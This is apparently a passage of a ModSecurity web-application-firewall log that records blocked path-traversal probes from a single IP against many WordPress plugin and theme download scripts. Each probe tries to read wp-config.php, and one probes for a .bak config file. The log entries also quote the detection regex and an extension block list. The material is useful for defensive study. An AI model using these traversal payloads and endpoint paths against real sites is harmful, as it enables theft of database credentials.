"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZmDJF7fZx2Sf7LbCrFH3eAAAANg"] [Wed Jun 05 15:22:49.594699 2024] [:error] [pid 5987:tid 139916151293696] [client 146.70.105.59:53354] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZmDJGeddjqHaWkbIrEiTogAAAJI"] [Wed Jun 05 15:22:50.716920 2024] [:error] [pid 5985:tid 139916277184256] [client 146.70.105.59:53358] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "ZmDJGn-RSuYgfBobnK4nhgAAAAM"] [Wed Jun 05 15:23:08.181399 2024] [:error] [pid 5985:tid 139916142900992] [client 146.70.105.59:53394] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZmDJLH-RSuYgfBobnK4njAAAABM"] [Wed Jun 05 15:23:21.490137 2024] [:error] [pid 5987:tid 139916218435328] [client 146.70.105.59:53400] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "ZmDJOeddjqHaWkbIrEiTqAAAAIo"] [Wed Jun 05 15:23:23.780629 2024] [:error] [pid 5985:tid 139916184864512] [client 146.70.105.59:53406] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "ZmDJO3-RSuYgfBobnK4njQAAAA4"] [Wed Jun 05 15:23:25.805323 2024] [:error] [pid 5987:tid 139916210042624] [client 146.70.105.59:53412] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "ZmDJPeddjqHaWkbIrEiTqgAAAIs"] [Wed Jun 05 15:23:28.490449 2024] [:error] [pid 5985:tid 139916126115584] [client 146.70.105.59:53420] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZmDJQH-RSuYgfBobnK4njwAAABU"] [Wed Jun 05 15:23:28.617889 2024] [:error] [pid 5987:tid 139916243613440] [client 146.70.105.59:53422] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZmDJQOddjqHaWkbIrEiTrQAAAIc"] [Wed Jun 05 15:23:39.373655 2024] [:error] [pid 5987:tid 139916142900992] [client 146.70.105.59:53450] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "ZmDJS-ddjqHaWkbIrEiTswAAAJM"] [Wed Jun 05 15:23:42.337819 2024] [:error] [pid 6611:tid 139916176471808] [client 146.70.105.59:53458] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "ZmDJTrfZx2Sf7LbCrFH3hgAAAM8"] [Wed Jun 05 15:23:45.851810 2024] [:error] [pid 6611:tid 139916201649920] [client 146.70.105.59:53466] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rttheme18/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rttheme18/download.php"] [unique_id "ZmDJUbfZx2Sf7LbCrFH3hwAAAMw"] [Wed Jun 05 15:23:48.850428 2024] [:error] [pid 5987:tid 139916277184256] [client 146.70.105.59:53474] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "ZmDJVOddjqHaWkbIrEiTuAAAAIM"] [Wed Jun 05 15:23:49.929784 2024] [:error] [pid 5987:tid 139916243613440] [client 146.70.105.59:53478] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "ZmDJVeddjqHaWkbIrEiTugAAAIc"] [Wed Jun 05 15:23:50.113016 2024] [:error] [pid 5987:tid 139916226828032] [client 146.70.105.59:53480] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config-sample.bak"] [unique_id "ZmDJVuddjqHaWkbIrEiTuwAAAIk"] [Wed Jun 05 15:23:54.659379 2024] [:error] [pid 5985:tid 139916260398848] [client 146.70.105.59:53494] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "ZmDJWn-RSuYgfBobnK4nkwAAAAU"] [Wed Jun 05 15:23:54.865401 2024] [:error] [pid 5985:tid 139916364232448] [client 146.70.105.59:53496] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZmDJWn-RSuYgfBobnK4nlAAAAAE"] [Wed Jun 05 15:23:55.943026 2024] [:error] [pid 5985:tid 139916355839744] [client 146.70.105.59:53500] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZmDJW3-RSuYgfBobnK4nlgAAAAI"] [Wed Jun 05 15:23:58.552229 2024] [:error] [pid 6611:tid 139916235220736] [client 146.70.105.59:53508] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZmDJXrfZx2Sf7LbCrFH3jAAAAMg"] [Wed Jun 05 15:23:58.687356 2024] [:error] [pid 5987:tid 139916134508288] [client 146.70.105.59:53510] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZmDJXuddjqHaWkbIrEiTvgAAAJQ"] [Wed Jun 05 15:23:58.812909 2024] [:error] [pid 5985:tid 139916235220736] [client 146.70.105.59:53512] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hello-elementor/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hello-elementor/down.php"] [unique_id "ZmDJXn-RSuYgfBobnK4nlwAAAAg"] [Wed Jun 05 15:23:59.843491 2024] [:error] [pid 5985:tid 139916176471808] [client 146.70.105.59:53516] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZmDJX3-RSuYgfBobnK4nmQAAAA8"] [Wed Jun 05 15:23:59.980000 2024] [:error] [pid 5985:tid 139916134508288] [client 146.70.105.59:53518] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match 